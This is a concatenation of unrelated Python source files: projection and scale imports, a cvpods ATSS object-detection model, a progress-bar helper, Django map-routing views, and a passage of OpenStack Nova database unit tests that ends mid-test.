from . transform import Transform
from .albers import Albers
from .polar import PolarProjection
from .hammer import HammerProjection
from .identity import IdentityProjection
from .conic_equal_area import ConicEqualArea
from .transverse_mercator import TransverseMercatorProjection
from .azimuthal_equal_area import AzimuthalEqualAreaProjection
from .azimuthal_equidistant import AzimuthalEquidistantProjection
from .pvm_projection import PVMProjection
# from perpective_projection import PerspectiveProjection
from .orthographic_projection import OrthographicProjection
from . quantitative_scale import QuantitativeScale
from . log_scale import LogScale
from . power_scale import PowerScale
from . linear_scale import LinearScale
|
py | b40028906f6f26b6b3b218dc8391f421d17c1e80 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (C) 2019-2021 Megvii Inc. All rights reserved.
import torch
import torch.nn.functional as F
from torch import nn
from cvpods.layers import ShapeSpec, cat, generalized_batched_nms
from cvpods.modeling.box_regression import Shift2BoxTransform
from cvpods.modeling.losses import iou_loss, sigmoid_focal_loss_jit
from cvpods.modeling.meta_arch.fcos import FCOSHead, permute_all_cls_and_box_to_N_HWA_K_and_concat
from cvpods.modeling.meta_arch.retinanet import permute_to_N_HWA_K
from cvpods.modeling.postprocessing import detector_postprocess
from cvpods.structures import Boxes, ImageList, Instances, pairwise_iou
from cvpods.utils import comm, log_first_n
class ATSS(nn.Module):
"""
Implement ATSS (https://arxiv.org/abs/1912.02424).
"""
def __init__(self, cfg):
super().__init__()
self.device = torch.device(cfg.MODEL.DEVICE)
# fmt: off
self.num_classes = cfg.MODEL.FCOS.NUM_CLASSES
self.in_features = cfg.MODEL.FCOS.IN_FEATURES
self.fpn_strides = cfg.MODEL.FCOS.FPN_STRIDES
# Loss parameters:
self.focal_loss_alpha = cfg.MODEL.FCOS.FOCAL_LOSS_ALPHA
self.focal_loss_gamma = cfg.MODEL.FCOS.FOCAL_LOSS_GAMMA
self.iou_loss_type = cfg.MODEL.FCOS.IOU_LOSS_TYPE
self.reg_weight = cfg.MODEL.FCOS.REG_WEIGHT
# Inference parameters:
self.score_threshold = cfg.MODEL.FCOS.SCORE_THRESH_TEST
self.topk_candidates = cfg.MODEL.FCOS.TOPK_CANDIDATES_TEST
self.nms_threshold = cfg.MODEL.FCOS.NMS_THRESH_TEST
self.nms_type = cfg.MODEL.NMS_TYPE
self.max_detections_per_image = cfg.TEST.DETECTIONS_PER_IMAGE
# fmt: on
self.backbone = cfg.build_backbone(
cfg, input_shape=ShapeSpec(channels=len(cfg.MODEL.PIXEL_MEAN)))
backbone_shape = self.backbone.output_shape()
feature_shapes = [backbone_shape[f] for f in self.in_features]
self.head = FCOSHead(cfg, feature_shapes)
self.shift_generator = cfg.build_shift_generator(cfg, feature_shapes)
# Matching and loss
self.shift2box_transform = Shift2BoxTransform(
weights=cfg.MODEL.FCOS.BBOX_REG_WEIGHTS)
self.anchor_scale = cfg.MODEL.ATSS.ANCHOR_SCALE
self.atss_topk = cfg.MODEL.ATSS.TOPK
pixel_mean = torch.Tensor(cfg.MODEL.PIXEL_MEAN).to(self.device).view(
3, 1, 1)
pixel_std = torch.Tensor(cfg.MODEL.PIXEL_STD).to(self.device).view(
3, 1, 1)
self.normalizer = lambda x: (x - pixel_mean) / pixel_std
self.to(self.device)
def forward(self, batched_inputs):
"""
Args:
batched_inputs: a list, batched outputs of :class:`DatasetMapper` .
Each item in the list contains the inputs for one image.
For now, each item in the list is a dict that contains:
* image: Tensor, image in (C, H, W) format.
* instances: Instances
Other information that's included in the original dicts, such as:
* "height", "width" (int): the output resolution of the model, used in inference.
See :meth:`postprocess` for details.
Returns:
dict[str: Tensor]:
mapping from a named loss to a tensor storing the loss. Used during training only.
"""
images = self.preprocess_image(batched_inputs)
if "instances" in batched_inputs[0]:
gt_instances = [
x["instances"].to(self.device) for x in batched_inputs
]
elif "targets" in batched_inputs[0]:
log_first_n(
"WARNING",
"'targets' in the model inputs is now renamed to 'instances'!",
n=10)
gt_instances = [
x["targets"].to(self.device) for x in batched_inputs
]
else:
gt_instances = None
features = self.backbone(images.tensor)
features = [features[f] for f in self.in_features]
box_cls, box_delta, box_center = self.head(features)
shifts = self.shift_generator(features)
if self.training:
gt_classes, gt_shifts_reg_deltas, gt_centerness = self.get_ground_truth(
shifts, gt_instances)
return self.losses(gt_classes, gt_shifts_reg_deltas, gt_centerness,
box_cls, box_delta, box_center)
else:
results = self.inference(box_cls, box_delta, box_center, shifts,
images)
processed_results = []
for results_per_image, input_per_image, image_size in zip(
results, batched_inputs, images.image_sizes):
height = input_per_image.get("height", image_size[0])
width = input_per_image.get("width", image_size[1])
r = detector_postprocess(results_per_image, height, width)
processed_results.append({"instances": r})
return processed_results
def losses(self, gt_classes, gt_shifts_deltas, gt_centerness,
pred_class_logits, pred_shift_deltas, pred_centerness):
"""
Args:
For `gt_classes`, `gt_shifts_deltas` and `gt_centerness` parameters, see
:meth:`FCOS.get_ground_truth`.
Their shapes are (N, R) and (N, R, 4), respectively, where R is
the total number of shifts across levels, i.e. sum(Hi x Wi)
For `pred_class_logits`, `pred_shift_deltas` and `pred_centerness`, see
:meth:`FCOSHead.forward`.
Returns:
dict[str: Tensor]:
mapping from a named loss to a scalar tensor
storing the loss. Used during training only. The dict keys are:
"loss_cls" and "loss_box_reg"
"""
pred_class_logits, pred_shift_deltas, pred_centerness = \
permute_all_cls_and_box_to_N_HWA_K_and_concat(
pred_class_logits, pred_shift_deltas, pred_centerness,
self.num_classes
) # Shapes: (N x R, K) and (N x R, 4), respectively.
gt_classes = gt_classes.flatten()
gt_shifts_deltas = gt_shifts_deltas.view(-1, 4)
gt_centerness = gt_centerness.view(-1, 1)
valid_idxs = gt_classes >= 0
foreground_idxs = (gt_classes >= 0) & (gt_classes != self.num_classes)
num_foreground = foreground_idxs.sum()
gt_classes_target = torch.zeros_like(pred_class_logits)
gt_classes_target[foreground_idxs, gt_classes[foreground_idxs]] = 1
num_foreground = comm.all_reduce(num_foreground) / float(comm.get_world_size())
num_foreground_centerness = gt_centerness[foreground_idxs].sum()
num_targets = comm.all_reduce(num_foreground_centerness) / float(comm.get_world_size())
# logits loss
loss_cls = sigmoid_focal_loss_jit(
pred_class_logits[valid_idxs],
gt_classes_target[valid_idxs],
alpha=self.focal_loss_alpha,
gamma=self.focal_loss_gamma,
reduction="sum",
) / max(1.0, num_foreground)
# regression loss
loss_box_reg = iou_loss(
pred_shift_deltas[foreground_idxs],
gt_shifts_deltas[foreground_idxs],
gt_centerness[foreground_idxs],
box_mode="ltrb",
loss_type=self.iou_loss_type,
reduction="sum",
) / max(1.0, num_targets) * self.reg_weight
# ) / max(1.0, num_foreground) * self.reg_weight
# centerness loss
loss_centerness = F.binary_cross_entropy_with_logits(
pred_centerness[foreground_idxs],
gt_centerness[foreground_idxs],
reduction="sum",
) / max(1, num_foreground)
return {
"loss_cls": loss_cls,
"loss_box_reg": loss_box_reg,
"loss_centerness": loss_centerness
}
@torch.no_grad()
def get_ground_truth(self, shifts, targets):
"""
Args:
shifts (list[list[Tensor]]): a list of N=#image elements. Each is a
list of #feature level tensors. The tensors contains shifts of
this image on the specific feature level.
targets (list[Instances]): a list of N `Instances`s. The i-th
`Instances` contains the ground-truth per-instance annotations
for the i-th input image. Specify `targets` during training only.
Returns:
gt_classes (Tensor):
An integer tensor of shape (N, R) storing ground-truth
labels for each shift.
R is the total number of shifts, i.e. the sum of Hi x Wi for all levels.
Shifts in the valid boxes are assigned their corresponding label in the
[0, K-1] range. Shifts in the background are assigned the label "K".
Shifts in the ignore areas are assigned a label "-1", i.e. ignore.
gt_shifts_deltas (Tensor):
Shape (N, R, 4).
The last dimension represents ground-truth shift2box transform
targets (dl, dt, dr, db) that map each shift to its matched ground-truth box.
The values in the tensor are meaningful only when the corresponding
shift is labeled as foreground.
gt_centerness (Tensor):
An float tensor (0, 1) of shape (N, R) whose values in [0, 1]
storing ground-truth centerness for each shift.
"""
gt_classes = []
gt_shifts_deltas = []
gt_centerness = []
for shifts_per_image, targets_per_image in zip(shifts, targets):
shifts_over_all_feature_maps = torch.cat(shifts_per_image, dim=0)
gt_boxes = targets_per_image.gt_boxes
is_in_boxes = self.shift2box_transform.get_deltas(
shifts_over_all_feature_maps, gt_boxes.tensor.unsqueeze(1)
).min(dim=-1).values > 0
gt_positions_iou = []
candidate_idxs = []
base = 0
for stride, shifts_i in zip(self.fpn_strides, shifts_per_image):
gt_positions_iou.append(pairwise_iou(
gt_boxes,
Boxes(torch.cat((
shifts_i - stride * self.anchor_scale / 2,
shifts_i + stride * self.anchor_scale / 2,
), dim=1))
))
distances = (
gt_boxes.get_centers().unsqueeze(1) - shifts_i
).pow_(2).sum(dim=-1).sqrt_()
_, topk_idxs = distances.topk(
self.atss_topk, dim=1, largest=False)
candidate_idxs.append(base + topk_idxs)
base += len(shifts_i)
gt_positions_iou = torch.cat(gt_positions_iou, dim=1)
candidate_idxs = torch.cat(candidate_idxs, dim=1)
candidate_ious = gt_positions_iou.gather(1, candidate_idxs)
ious_thr = (candidate_ious.mean(dim=1, keepdim=True)
+ candidate_ious.std(dim=1, keepdim=True))
is_foreground = torch.zeros_like(
is_in_boxes).scatter_(1, candidate_idxs, True)
is_foreground &= gt_positions_iou >= ious_thr
gt_positions_iou[~is_in_boxes] = -1
gt_positions_iou[~is_foreground] = -1
# if there are still more than one objects for a position,
# we choose the one with maximum iou
positions_max_iou, gt_matched_idxs = gt_positions_iou.max(dim=0)
# ground truth box regression
gt_shifts_reg_deltas_i = self.shift2box_transform.get_deltas(
shifts_over_all_feature_maps, gt_boxes[gt_matched_idxs].tensor)
# ground truth classes
has_gt = len(targets_per_image) > 0
if has_gt:
gt_classes_i = targets_per_image.gt_classes[gt_matched_idxs]
# Shifts with iou -1 are treated as background.
gt_classes_i[positions_max_iou == -1] = self.num_classes
else:
gt_classes_i = torch.zeros_like(
gt_matched_idxs) + self.num_classes
# ground truth centerness
left_right = gt_shifts_reg_deltas_i[:, [0, 2]]
top_bottom = gt_shifts_reg_deltas_i[:, [1, 3]]
gt_centerness_i = torch.sqrt(
(left_right.min(dim=-1).values / left_right.max(dim=-1).values).clamp_(min=0)
* (top_bottom.min(dim=-1).values / top_bottom.max(dim=-1).values).clamp_(min=0)
)
gt_classes.append(gt_classes_i)
gt_shifts_deltas.append(gt_shifts_reg_deltas_i)
gt_centerness.append(gt_centerness_i)
return torch.stack(gt_classes), torch.stack(
gt_shifts_deltas), torch.stack(gt_centerness)
def inference(self, box_cls, box_delta, box_center, shifts, images):
"""
Arguments:
box_cls, box_delta, box_center: Same as the output of :meth:`FCOSHead.forward`
shifts (list[list[Tensor]): a list of #images elements. Each is a
list of #feature level tensor. The tensor contain shifts of this
image on the specific feature level.
images (ImageList): the input images
Returns:
results (List[Instances]): a list of #images elements.
"""
assert len(shifts) == len(images)
results = []
box_cls = [permute_to_N_HWA_K(x, self.num_classes) for x in box_cls]
box_delta = [permute_to_N_HWA_K(x, 4) for x in box_delta]
box_center = [permute_to_N_HWA_K(x, 1) for x in box_center]
# list[Tensor], one per level, each has shape (N, Hi x Wi, K or 4)
for img_idx, shifts_per_image in enumerate(shifts):
image_size = images.image_sizes[img_idx]
box_cls_per_image = [
box_cls_per_level[img_idx] for box_cls_per_level in box_cls
]
box_reg_per_image = [
box_reg_per_level[img_idx] for box_reg_per_level in box_delta
]
box_ctr_per_image = [
box_ctr_per_level[img_idx] for box_ctr_per_level in box_center
]
results_per_image = self.inference_single_image(
box_cls_per_image, box_reg_per_image, box_ctr_per_image,
shifts_per_image, tuple(image_size))
results.append(results_per_image)
return results
def inference_single_image(self, box_cls, box_delta, box_center, shifts,
image_size):
"""
Single-image inference. Return bounding-box detection results by thresholding
on scores and applying non-maximum suppression (NMS).
Arguments:
box_cls (list[Tensor]): list of #feature levels. Each entry contains
tensor of size (H x W, K)
box_delta (list[Tensor]): Same shape as 'box_cls' except that K becomes 4.
box_center (list[Tensor]): Same shape as 'box_cls' except that K becomes 1.
shifts (list[Tensor]): list of #feature levels. Each entry contains
a tensor, which contains all the shifts for that
image in that feature level.
image_size (tuple(H, W)): a tuple of the image height and width.
Returns:
Same as `inference`, but for only one image.
"""
boxes_all = []
scores_all = []
class_idxs_all = []
# Iterate over every feature level
for box_cls_i, box_reg_i, box_ctr_i, shifts_i in zip(
box_cls, box_delta, box_center, shifts):
# (HxWxK,)
box_cls_i = box_cls_i.flatten().sigmoid_()
# Keep top k top scoring indices only.
num_topk = min(self.topk_candidates, box_reg_i.size(0))
# torch.sort is actually faster than .topk (at least on GPUs)
predicted_prob, topk_idxs = box_cls_i.sort(descending=True)
predicted_prob = predicted_prob[:num_topk]
topk_idxs = topk_idxs[:num_topk]
# filter out the proposals with low confidence score
keep_idxs = predicted_prob > self.score_threshold
predicted_prob = predicted_prob[keep_idxs]
topk_idxs = topk_idxs[keep_idxs]
shift_idxs = topk_idxs // self.num_classes
classes_idxs = topk_idxs % self.num_classes
box_reg_i = box_reg_i[shift_idxs]
shifts_i = shifts_i[shift_idxs]
# predict boxes
predicted_boxes = self.shift2box_transform.apply_deltas(
box_reg_i, shifts_i)
box_ctr_i = box_ctr_i.flatten().sigmoid_()[shift_idxs]
predicted_prob = torch.sqrt(predicted_prob * box_ctr_i)
boxes_all.append(predicted_boxes)
scores_all.append(predicted_prob)
class_idxs_all.append(classes_idxs)
boxes_all, scores_all, class_idxs_all = [
cat(x) for x in [boxes_all, scores_all, class_idxs_all]
]
keep = generalized_batched_nms(
boxes_all, scores_all, class_idxs_all,
self.nms_threshold, nms_type=self.nms_type
)
keep = keep[:self.max_detections_per_image]
result = Instances(image_size)
result.pred_boxes = Boxes(boxes_all[keep])
result.scores = scores_all[keep]
result.pred_classes = class_idxs_all[keep]
return result
def preprocess_image(self, batched_inputs):
"""
Normalize, pad and batch the input images.
"""
images = [x["image"].to(self.device) for x in batched_inputs]
images = [self.normalizer(x) for x in images]
images = ImageList.from_tensors(images,
self.backbone.size_divisibility)
return images
def _inference_for_ms_test(self, batched_inputs):
"""
function used for multiscale test, will be refactor in the future.
The same input with `forward` function.
"""
assert not self.training, "inference mode with training=True"
assert len(batched_inputs) == 1, "inference image number > 1"
images = self.preprocess_image(batched_inputs)
features = self.backbone(images.tensor)
features = [features[f] for f in self.in_features]
box_cls, box_delta, box_center = self.head(features)
shifts = self.shift_generator(features)
results = self.inference(box_cls, box_delta, box_center, shifts, images)
for results_per_image, input_per_image, image_size in zip(
results, batched_inputs, images.image_sizes
):
height = input_per_image.get("height", image_size[0])
width = input_per_image.get("width", image_size[1])
processed_results = detector_postprocess(results_per_image, height, width)
return processed_results
|
py | b400289fab2b84fb2a4d172a04dad2d22e9f0674 | """ TIMEFLIESBAR PROGRESS_BAR FUNCTION """
# Contact.
# [email protected]
# ---------------------------------------------------------------------------#
# Pass-trough variables.
tm: int
""" total_minutes from tfb_calculus. """
gm: int
""" gone_minutes from tfb_calculus. """
# Regular variables.
percent_decimals: int
""" Decimals to show on percentages. """
bar_length: int
""" Bar length. """
bar_fill: str
""" Character for filled bar. """
not_fill: str
""" Character for not filled bar. """
percent_right: int
""" Percentage of year gone. """
percent_left: int
""" Percentage of year left. """
filled_length: int
""" Length for filled bar. """
not_filled_length: int
""" Length for not filled bar. """
bar: str
""" Progress bar representation. """
progressbar: str
""" Progress bar printing. """
# ---------------------------------------------------------------------------#
# Obtain gone progressbar.
def progress_bar(tm, gm, percent_decimals = 2, bar_length=12, bar_fill = "░", not_fill = "▓"):
percent_right = ("{0:." + str(percent_decimals) + "f}").format(100 - (100 * (gm / int(tm))))
percent_left = ("{0:." + str(percent_decimals) + "f}").format(100 * (gm / int(tm)))
filled_length = int(bar_length * gm // tm)
not_filled_length = int(bar_length - filled_length)
bar = bar_fill * filled_length + not_fill * not_filled_length
progressbar = f"{percent_left}% Gone {bar} Left {percent_right}%"
return progressbar
|
py | b400292e2b080f1144509877699d28fd1b1e9407 | from django.shortcuts import render, redirect, reverse
from django.conf import settings
from django_google_api.mixins import Directions
'''
Basic view for routing
'''
def route(request):
context = {
"google_api_key": settings.GOOGLE_API_KEY,
"base_country": settings.BASE_COUNTRY}
return render(request, 'main/route.html', context)
'''
Basic view for displaying a map
'''
def map(request):
lat_a = request.GET.get("lat_a", None)
long_a = request.GET.get("long_a", None)
lat_b = request.GET.get("lat_b", None)
long_b = request.GET.get("long_b", None)
lat_c = request.GET.get("lat_c", None)
long_c = request.GET.get("long_c", None)
lat_d = request.GET.get("lat_d", None)
long_d = request.GET.get("long_d", None)
#only call API if all 4 addresses are added
if lat_a and lat_b and lat_c and lat_d:
directions = Directions(
lat_a= lat_a,
long_a=long_a,
lat_b = lat_b,
long_b=long_b,
lat_c= lat_c,
long_c=long_c,
lat_d = lat_d,
long_d=long_d
)
else:
return redirect(reverse('main:route'))
context = {
"google_api_key": settings.GOOGLE_API_KEY,
"base_country": settings.BASE_COUNTRY,
"lat_a": lat_a,
"long_a": long_a,
"lat_b": lat_b,
"long_b": long_b,
"lat_c": lat_c,
"long_c": long_c,
"lat_d": lat_d,
"long_d": long_d,
"origin": f'{lat_a}, {long_a}',
"destination": f'{lat_b}, {long_b}',
"directions": directions,
}
return render(request, 'main/map.html', context) |
py | b40029fe10f993be8c475dfe864c68c4d8a4bc4c | # encoding=UTF8
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the DB API."""
import copy
import datetime
import types
import uuid as stdlib_uuid
import iso8601
import mock
import netaddr
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_db.sqlalchemy import test_base
from oslo_db.sqlalchemy import utils as sqlalchemyutils
from oslo_serialization import jsonutils
from oslo_utils import timeutils
import six
from sqlalchemy import Column
from sqlalchemy.dialects import sqlite
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy.orm import query
from sqlalchemy import sql
from sqlalchemy import Table
from nova import block_device
from nova.compute import arch
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import vm_states
from nova import context
from nova import db
from nova.db.sqlalchemy import api as sqlalchemy_api
from nova.db.sqlalchemy import models
from nova.db.sqlalchemy import types as col_types
from nova.db.sqlalchemy import utils as db_utils
from nova import exception
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import uuidutils
from nova import quota
from nova import test
from nova.tests.unit import matchers
from nova import utils
CONF = cfg.CONF
CONF.import_opt('reserved_host_memory_mb', 'nova.compute.resource_tracker')
CONF.import_opt('reserved_host_disk_mb', 'nova.compute.resource_tracker')
get_engine = sqlalchemy_api.get_engine
get_session = sqlalchemy_api.get_session
def _reservation_get(context, uuid):
result = sqlalchemy_api.model_query(context, models.Reservation,
read_deleted="no").filter_by(uuid=uuid).first()
if not result:
raise exception.ReservationNotFound(uuid=uuid)
return result
def _quota_reserve(context, project_id, user_id):
"""Create sample Quota, QuotaUsage and Reservation objects.
There is no method db.quota_usage_create(), so we have to use
db.quota_reserve() for creating QuotaUsage objects.
Returns reservations uuids.
"""
def get_sync(resource, usage):
def sync(elevated, project_id, user_id, session):
return {resource: usage}
return sync
quotas = {}
user_quotas = {}
resources = {}
deltas = {}
for i in range(3):
resource = 'resource%d' % i
if i == 2:
# test for project level resources
resource = 'fixed_ips'
quotas[resource] = db.quota_create(context,
project_id, resource, i)
user_quotas[resource] = quotas[resource]
else:
quotas[resource] = db.quota_create(context,
project_id, resource, i)
user_quotas[resource] = db.quota_create(context, project_id,
resource, i,
user_id=user_id)
sync_name = '_sync_%s' % resource
resources[resource] = quota.ReservableResource(
resource, sync_name, 'quota_res_%d' % i)
deltas[resource] = i
setattr(sqlalchemy_api, sync_name, get_sync(resource, i))
sqlalchemy_api.QUOTA_SYNC_FUNCTIONS[sync_name] = getattr(
sqlalchemy_api, sync_name)
return db.quota_reserve(context, resources, quotas, user_quotas, deltas,
timeutils.utcnow(), CONF.until_refresh,
datetime.timedelta(days=1), project_id, user_id)
class DbTestCase(test.TestCase):
def setUp(self):
super(DbTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
def create_instance_with_args(self, **kwargs):
args = {'reservation_id': 'a', 'image_ref': 1, 'host': 'host1',
'node': 'node1', 'project_id': self.project_id,
'vm_state': 'fake'}
if 'context' in kwargs:
ctxt = kwargs.pop('context')
args['project_id'] = ctxt.project_id
else:
ctxt = self.context
args.update(kwargs)
return db.instance_create(ctxt, args)
def fake_metadata(self, content):
meta = {}
for i in range(0, 10):
meta["foo%i" % i] = "this is %s item %i" % (content, i)
return meta
def create_metadata_for_instance(self, instance_uuid):
meta = self.fake_metadata('metadata')
db.instance_metadata_update(self.context, instance_uuid, meta, False)
sys_meta = self.fake_metadata('system_metadata')
db.instance_system_metadata_update(self.context, instance_uuid,
sys_meta, False)
return meta, sys_meta
class DecoratorTestCase(test.TestCase):
def _test_decorator_wraps_helper(self, decorator):
def test_func():
"""Test docstring."""
decorated_func = decorator(test_func)
self.assertEqual(test_func.func_name, decorated_func.func_name)
self.assertEqual(test_func.__doc__, decorated_func.__doc__)
self.assertEqual(test_func.__module__, decorated_func.__module__)
def test_require_context_decorator_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api.require_context)
def test_require_admin_context_decorator_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api.require_admin_context)
def test_require_deadlock_retry_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api._retry_on_deadlock)
def _get_fake_aggr_values():
return {'name': 'fake_aggregate'}
def _get_fake_aggr_metadata():
return {'fake_key1': 'fake_value1',
'fake_key2': 'fake_value2',
'availability_zone': 'fake_avail_zone'}
def _get_fake_aggr_hosts():
return ['foo.openstack.org']
def _create_aggregate(context=context.get_admin_context(),
values=_get_fake_aggr_values(),
metadata=_get_fake_aggr_metadata()):
return db.aggregate_create(context, values, metadata)
def _create_aggregate_with_hosts(context=context.get_admin_context(),
values=_get_fake_aggr_values(),
metadata=_get_fake_aggr_metadata(),
hosts=_get_fake_aggr_hosts()):
result = _create_aggregate(context=context,
values=values, metadata=metadata)
for host in hosts:
db.aggregate_host_add(context, result['id'], host)
return result
class NotDbApiTestCase(DbTestCase):
def setUp(self):
super(NotDbApiTestCase, self).setUp()
self.flags(connection='notdb://', group='database')
def test_instance_get_all_by_filters_regex_unsupported_db(self):
# Ensure that the 'LIKE' operator is used for unsupported dbs.
self.create_instance_with_args(display_name='test1')
self.create_instance_with_args(display_name='test2')
self.create_instance_with_args(display_name='diff')
result = db.instance_get_all_by_filters(self.context,
{'display_name': 'test'})
self.assertEqual(2, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': 'di'})
self.assertEqual(1, len(result))
def test_instance_get_all_by_filters_paginate(self):
test1 = self.create_instance_with_args(display_name='test1')
test2 = self.create_instance_with_args(display_name='test2')
test3 = self.create_instance_with_args(display_name='test3')
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
marker=None)
self.assertEqual(3, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test1['uuid'])
self.assertEqual(2, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test2['uuid'])
self.assertEqual(1, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test3['uuid'])
self.assertEqual(0, len(result))
self.assertRaises(exception.MarkerNotFound,
db.instance_get_all_by_filters,
self.context, {'display_name': '%test%'},
marker=str(stdlib_uuid.uuid4()))
def _assert_equals_inst_order(self, correct_order, filters,
sort_keys=None, sort_dirs=None,
limit=None, marker=None,
match_keys=['uuid', 'vm_state',
'display_name', 'id']):
'''Retrieves instances based on the given filters and sorting
information and verifies that the instances are returned in the
correct sorted order by ensuring that the supplied keys match.
'''
result = db.instance_get_all_by_filters_sort(
self.context, filters, limit=limit, marker=marker,
sort_keys=sort_keys, sort_dirs=sort_dirs)
self.assertEqual(len(correct_order), len(result))
for inst1, inst2 in zip(result, correct_order):
for key in match_keys:
self.assertEqual(inst1.get(key), inst2.get(key))
return result
def test_instance_get_all_by_filters_sort_keys(self):
'''Verifies sort order and direction for multiple instances.'''
# Instances that will reply to the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
# Other instances in the DB, will not match name filter
other_error = self.create_instance_with_args(
display_name='other',
vm_state=vm_states.ERROR)
other_active = self.create_instance_with_args(
display_name='other',
vm_state=vm_states.ACTIVE)
filters = {'display_name': '%test%'}
# Verify different sort key/direction combinations
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'asc', 'asc']
correct_order = [test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['asc', 'desc', 'asc']
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['desc', 'desc', 'asc']
correct_order = [test2_error, test2_error2, test2_active,
test1_error, test1_error2, test1_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# created_at is added by default if not supplied, descending order
sort_keys = ['display_name', 'vm_state']
sort_dirs = ['desc', 'desc']
correct_order = [test2_error2, test2_error, test2_active,
test1_error2, test1_error, test1_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Now created_at should be in ascending order (defaults to the first
# sort dir direction)
sort_dirs = ['asc', 'asc']
correct_order = [test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Remove name filter, get all instances
correct_order = [other_active, other_error,
test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, {},
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Default sorting, 'created_at' then 'id' in desc order
correct_order = [other_active, other_error,
test2_error2, test2_error, test2_active,
test1_error2, test1_error, test1_active]
self._assert_equals_inst_order(correct_order, {})
def test_instance_get_all_by_filters_sort_keys_paginate(self):
'''Verifies sort order with pagination.'''
# Instances that will reply to the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
# Other instances in the DB, will not match name filter
self.create_instance_with_args(display_name='other')
self.create_instance_with_args(display_name='other')
filters = {'display_name': '%test%'}
# Common sort information for every query
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'desc', 'asc']
# Overall correct instance order based on the sort keys
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
# Limits of 1, 2, and 3, verify that the instances returned are in the
# correct sorted order, update the marker to get the next correct page
for limit in range(1, 4):
marker = None
# Include the maximum number of instances (ie, 6) to ensure that
# the last query (with marker pointing to the last instance)
# returns 0 servers
for i in range(0, 7, limit):
if i == len(correct_order):
correct = []
else:
correct = correct_order[i:i + limit]
insts = self._assert_equals_inst_order(
correct, filters,
sort_keys=sort_keys, sort_dirs=sort_dirs,
limit=limit, marker=marker)
if correct:
marker = insts[-1]['uuid']
self.assertEqual(correct[-1]['uuid'], marker)
def test_instance_get_all_by_filters_sort_key_invalid(self):
'''InvalidSortKey raised if an invalid key is given.'''
for keys in [['foo'], ['uuid', 'foo']]:
self.assertRaises(exception.InvalidSortKey,
db.instance_get_all_by_filters_sort,
self.context,
filters={},
sort_keys=keys)
def test_convert_objects_related_datetimes(self):
t1 = timeutils.utcnow()
t2 = t1 + datetime.timedelta(seconds=10)
t3 = t2 + datetime.timedelta(hours=1)
t2_utc = t2.replace(tzinfo=iso8601.iso8601.Utc())
t3_utc = t3.replace(tzinfo=iso8601.iso8601.Utc())
datetime_keys = ('created_at', 'deleted_at')
test1 = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
expected_dict = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
sqlalchemy_api.convert_objects_related_datetimes(test1, *datetime_keys)
self.assertEqual(test1, expected_dict)
test2 = {'created_at': t1, 'deleted_at': t2_utc, 'updated_at': t3}
expected_dict = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
sqlalchemy_api.convert_objects_related_datetimes(test2, *datetime_keys)
self.assertEqual(test2, expected_dict)
test3 = {'deleted_at': t2_utc, 'updated_at': t3_utc}
